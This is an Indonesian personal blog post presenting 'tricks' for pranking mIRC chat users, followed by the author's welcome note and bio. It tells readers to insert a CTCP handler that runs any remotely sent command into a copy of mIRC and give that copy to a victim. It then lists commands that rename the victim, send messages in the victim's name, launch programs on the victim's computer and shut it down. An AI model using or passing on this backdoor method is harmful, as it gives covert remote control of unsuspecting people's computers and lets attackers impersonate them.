Update 09 April 2011: Terima kasih telah berkunjung ke blog saya,maaf untuk ketidak nyamanannya karena blog dalam masa pembangunan. mohon dukungan dan motivasinya ya.... ^_^, salam: aziz imammudin rhamadhan.
Adsense Indonesia ads Internet Marketing - Online ads ads
Bookmark and Share

Apakah kalian sering menggunakan mIRC untuk chating??? Saya akan memberikan tips dan trik untuk menjahili orang yang sedang chating di mIRC bahkan kalian juga dapat mematikan computer korban dengan hanya memberikan sebuah script kepada si korban…!!! Mau tau cara nya….

Hanya menggunakan mIRC : caranya >>>



1. Yang pasti kalian harus memiliki mIRC
2. Jalankan mIRC
3. Setelah program mirc terbuka, tekan ALT+R
4. Tambahkan syntax ini ctcp *:*:?:$1- lalu tekan OK
5. Close program mIRC

Berikan program mIRC tadi yang sudah diberi script khusus kepada calon korban kalian, kalian bisa mengambilnya di c:\program files\mirc copy-kan seluruh isi yang berada di folder mirc, setelah itu berikan kepada calon korban anda.
>Ketika korban sudah online menggunakan mirc yang sudah diberi script, kita sudah bisa menjahili si korban, mulai dari mematikan komputer, mengganti nick si korban, mengirim pesan ke orang lain menggunakan nick korban, hingga menjalankan program yang ada di komputer si korban
Ingin tahu caranya? saya harap langkah-langkah diatas sudag kalian jalankan dan berhasil, saya sarankan anda juga mengetahui nick yang sedang korban jalankan contoh hack_jahil . Saya akan mengajarkan bagaimana menjahili si korban. Dan yang perlu kita lakukan adalah, mengetikan script pada mirc kita… (ingat kita harus sudah connect ke server dan sudah bisa melakukan chat)

Untuk merubah nick si korban dengan nick baru yang anda inginkan. ketikan script ini pada message anda /ctcp hack_jahil nick gua_loe

Mengirim pesan ke orang lain menggunakan nick korban /ctcp gua_loe msg nick-yg-mau-di-msg/#channel tesssstessssssstesssssss123

Supaya dia menjalankan program /ctcp gua_loe run iexplore.exe www.anfidz.web.id

Untuk menshut down komputer korban /ctcp gua_loe run rundll32.exe user,exitwindows

0 comments:

Selamat Datang Disitus Aziz

Selamat datang di situs saya, semoga saja kalian bisa mendapatkan apa yang kalian butuhkan diblog saya yang sangat sederhana ini. mohon maaf jika informasi yang disediakan sangat minim, dikarenakan kemampuan saya yang masih kurang, mari saling berbagi. semoga blogger indonesia bisa bersaing dengan blogger internasional lainnya. sukses slalu untuk semua.

Sekilas tentang penulis

Nama saya Aziz Imammudin Rhamadhan, saya seorang mahasiswa yang masih menuntut ilmu di salah satu perguruan tinggi di Bandung, salam kenal.

Aziz